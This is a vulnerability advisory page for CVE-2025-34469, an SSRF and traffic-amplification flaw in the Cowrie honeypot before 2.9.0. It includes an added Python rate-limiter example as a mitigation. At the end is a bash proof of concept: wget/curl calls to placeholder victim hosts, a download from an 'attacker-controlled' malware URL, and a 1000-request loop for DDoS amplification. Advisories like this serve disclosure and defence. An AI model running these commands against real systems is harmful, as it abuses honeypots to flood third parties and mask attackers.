Security Vulnerability Report
CVE-2025-34469 CVSS 7.5 HIGH

CVE-2025-34469

Published: 2025-12-31 22:15:49
Last Modified: 2026-01-13 22:10:42

Description

Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker’s true source address behind the honeypot’s IP.
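The missing control named above is an outbound rate limit. The following is an added example, not Cowrie's code and not the 2.9.0 patch: a token bucket per attacker source IP, checked before an emulated wget or curl is allowed to make a real request. The class and function names, the rate and burst values, and the sample addresses are assumptions made for this illustration.

```python
import time
from collections import defaultdict


class OutboundLimiter:
    """Token bucket per source IP gating real fetches (hypothetical helper)."""

    def __init__(self, rate_per_sec=0.5, burst=5, clock=time.monotonic):
        self.rate = rate_per_sec      # tokens regained per second (assumed value)
        self.burst = burst            # maximum tokens a source can hold
        self.clock = clock
        # src_ip -> (tokens remaining, time of last update)
        self.buckets = defaultdict(lambda: (float(burst), clock()))

    def allow(self, src_ip):
        """Return True if this source may trigger one more real HTTP request."""
        tokens, last = self.buckets[src_ip]
        now = self.clock()
        tokens = min(self.burst, tokens + (now - last) * self.rate)
        if tokens < 1.0:
            self.buckets[src_ip] = (tokens, now)
            return False              # emulate a failure instead of fetching
        self.buckets[src_ip] = (tokens - 1.0, now)
        return True


class FakeClock:
    """Deterministic clock so the demo runs without sleeping."""
    def __init__(self):
        self.now = 0.0
    def __call__(self):
        return self.now
    def advance(self, seconds):
        self.now += seconds


def demo():
    clock = FakeClock()
    limiter = OutboundLimiter(rate_per_sec=0.5, burst=5, clock=clock)
    # Constructed input: one source repeating the emulated command 1000 times.
    flood = ["198.51.100.7"] * 1000
    first = sum(limiter.allow(ip) for ip in flood)    # only the burst passes
    clock.advance(4)                                  # 4 s * 0.5/s = 2 tokens
    second = sum(limiter.allow(ip) for ip in flood)
    other = limiter.allow("203.0.113.9")              # separate bucket
    return first, second, other


if __name__ == "__main__":
    print(demo())
```

A per-source bucket alone does not bound total traffic when many sources connect, so a deployment would also want a global cap and eviction of idle buckets.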

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:cowrie:cowrie:*:*:*:*:*:*:*:* - VULNERABLE
Cowrie < 2.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```bash
# CVE-2025-34469 PoC - Cowrie SSRF via wget
# Target: Cowrie honeypot < 2.9.0
# Attacker connects to Cowrie honeypot via SSH/Telnet

# Method 1: Using wget to trigger SSRF
wget http://target-victim-site.com/large-file.iso

# Method 2: Using curl to trigger SSRF
curl http://victim-server.com/api/stress-endpoint

# Method 3: Download file to internal resource
wget -O /tmp/payload http://attacker-controlled-site.com/malware

# Method 4: Multiple requests for DDoS amplification
for i in {1..1000}; do
  wget -q http://target-site.com/index.html &
done
wait

# The honeypot will execute real outbound HTTP requests,
# masking the attacker's real IP and using honeypot's bandwidth.
```
